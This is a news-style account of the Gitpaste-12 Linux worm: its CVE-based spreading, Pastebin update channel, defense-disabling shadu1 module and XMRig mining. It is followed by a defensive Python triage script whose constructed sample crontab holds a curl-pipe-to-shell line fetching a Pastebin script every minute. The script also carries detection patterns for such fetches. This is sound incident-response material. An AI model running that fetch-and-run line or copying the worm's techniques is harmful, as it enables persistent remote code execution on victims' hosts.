Researchers at Juniper Networks have discovered Linux malware, written as shell scripts, with the functionality of a worm. Their analysis shows that Gitpaste-12, as Juniper named it, propagates itself by brute-forcing credentials and by exploiting known vulnerabilities. The bot can also fetch additional components from GitHub and Pastebin.
Gitpaste-12 first came to the researchers' attention on October 15. Judging by the commit history Juniper examined, the malware's code appeared on GitHub in early July. The shell-script samples contain test code, which suggests the project is still unfinished. At present the malware can attack x86 Linux servers and ARM- and MIPS-based IoT devices.
One module handles the bot's self-propagation to other hosts. In testing, the script picks a random /8 CIDR block (CIDR, Classless Inter-Domain Routing, is the classless scheme for allocating IP address ranges) and then iterates over every address in that range, so a single run sweeps roughly 16.7 million hosts. One variant of the script also opens ports 30004 and 30005 to receive shell commands.
To deliver a copy of itself to a target, Gitpaste-12 either brute-forces the Telnet password or uses one of the more than a dozen exploits in its arsenal:
- CVE-2017-14135 for the WebAdmin plugin of the OpenDreamBox firmware;
- CVE-2020-24217 for IPTV / H.264 / H.265 video encoders built on HiSilicon chips;
- CVE-2017-5638 for the Apache Struts framework;
- CVE-2020-10987 for Tenda routers;
- CVE-2014-8361 for the miniigd daemon in the Realtek SDK;
- CVE-2020-15893 for the UPnP stack in D-Link routers;
- CVE-2013-5948 for Asus routers;
- EDB-ID 48225 for Netlink GPON routers;
- EDB-ID 40500 for AVTECH IP cameras;
- CVE-2019-10758 for the mongo-express web interface for MongoDB;
- CVE-2017-17215 for Huawei HG532 WiFi routers.
Once on the target system, Gitpaste-12 connects to Pastebin and downloads the main script from a URL supplied by the operators. It then installs a cron job that re-downloads and re-executes that script every minute; the researchers believe this serves as the bot's update channel via Pastebin.
Gitpaste-12 then downloads the shadu1 module from GitHub and runs it. This script's job is to remove anything that might interfere with the malware: it attempts to disable the system's default defenses, including firewall rules, SELinux enforcement and the AppArmor security module, along with common attack-monitoring and prevention tools.
Notably, shadu1 can also terminate cloud security agents on command. The script contains comments in Chinese. On this basis the researchers suggested that Gitpaste-12's authors intend to target hosts running in the Alibaba Cloud and Tencent Cloud infrastructures.
Their ultimate goal is likely to mine Monero on victims' hardware: judging by the configuration file, the malware can run the XMRig cryptominer. Because Gitpaste-12 was discovered only recently, detection by the antivirus engines on VirusTotal is still poor. Following Juniper's intervention, the Pastebin links associated with the bot have been removed and the Git repository hosting the malicious files has been taken down.
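The behaviours described above (a cron job re-fetching a Pastebin-hosted script every minute, listeners on ports 30004/30005, the shadu1 module and an XMRig miner) are the indicators a responder would check for on a suspect Linux host. The script below is an added triage example, not Juniper's code or anything from the malware: it parses text a responder would collect from the host (a crontab listing, `ss -lntp` output and a process list) and flags those indicators. The sample inputs are constructed for the demonstration, and the download hosts, paste URL and miner pool it refers to are assumptions rather than indicators from the write-up.

```python
"""Host triage for the Gitpaste-12 indicators described in the write-up.

Added example, not Juniper's or the malware's code. It works on text
collected from a suspect host, so it runs offline; the SAMPLE_* inputs are
constructed for the demonstration.
"""
import re

# Indicators taken from the write-up: every-minute cron updates via Pastebin,
# shell listeners on 30004/30005, the shadu1 module and an XMRig miner.
# The GitHub hosts are an assumption (the write-up names GitHub, not a host).
DOWNLOAD_HOSTS = ("pastebin.com", "github.com", "raw.githubusercontent.com")
BOT_PORTS = {30004, 30005}
SUSPECT_NAMES = ("xmrig", "shadu1")

# Five-field cron spec that fires every minute: "* * * * *" or "*/1 * * * *".
EVERY_MINUTE = re.compile(r"^\s*(\*|\*/1)(\s+\*){4}\s+(.*)$")
FETCH_TOOL = re.compile(r"\b(curl|wget)\b")


def suspicious_cron_entries(crontab_text):
    """Return user-crontab lines that run every minute and fetch from a download host.

    Expects `crontab -l` style lines (no user column, unlike /etc/crontab).
    """
    hits = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        match = EVERY_MINUTE.match(line)
        if not match:
            continue
        command = match.group(3)
        if FETCH_TOOL.search(command) and any(h in command for h in DOWNLOAD_HOSTS):
            hits.append(line.strip())
    return hits


def bot_listener_ports(ss_text):
    """Return the bot's shell ports found listening in `ss -lntp` output."""
    found = set()
    for line in ss_text.splitlines():
        parts = line.split()
        # Columns: State Recv-Q Send-Q Local-Address:Port Peer-Address:Port Process
        if len(parts) < 4 or parts[0] != "LISTEN":
            continue
        port = parts[3].rsplit(":", 1)[-1]  # works for 0.0.0.0:p, [::]:p and *:p
        if port.isdigit() and int(port) in BOT_PORTS:
            found.add(int(port))
    return sorted(found)


def suspect_processes(ps_text):
    """Return process-list lines whose command mentions the miner or the shadu1 module."""
    return [
        line.strip()
        for line in ps_text.splitlines()
        if any(name in line.lower() for name in SUSPECT_NAMES)
    ]


def triage(crontab_text, ss_text, ps_text):
    """Combine the three checks; 'infected' is True if any indicator is present."""
    report = {
        "cron": suspicious_cron_entries(crontab_text),
        "ports": bot_listener_ports(ss_text),
        "processes": suspect_processes(ps_text),
    }
    report["infected"] = any(report[key] for key in ("cron", "ports", "processes"))
    return report


# Constructed sample input resembling an infected host (not real captures).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
* * * * * curl -s http://pastebin.com/raw/EXAMPLE | sh
"""
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*        users:(("sshd",pid=812,fd=3))
LISTEN 0      10     0.0.0.0:30004      0.0.0.0:*        users:(("sh",pid=2231,fd=4))
LISTEN 0      10     0.0.0.0:30005      0.0.0.0:*        users:(("sh",pid=2231,fd=5))
"""
SAMPLE_PS = """\
  PID USER     COMMAND
  812 root     /usr/sbin/sshd -D
 2231 root     sh -c /tmp/shadu1
 2240 root     /tmp/xmrig -o pool.example:3333
"""

if __name__ == "__main__":
    for key, value in triage(SAMPLE_CRONTAB, SAMPLE_SS, SAMPLE_PS).items():
        print(f"{key}: {value}")
```

On a live host the three inputs come from `crontab -l` (run for root and for every user, since the write-up does not say which account the job is installed under), `ss -lntp` and `ps -eo pid,user,command`. An empty result from this script is not a clean bill of health: shadu1 disables the defenses that would otherwise log the activity, so an absent indicator should be confirmed by checking that SELinux, AppArmor and the firewall are still in their expected state.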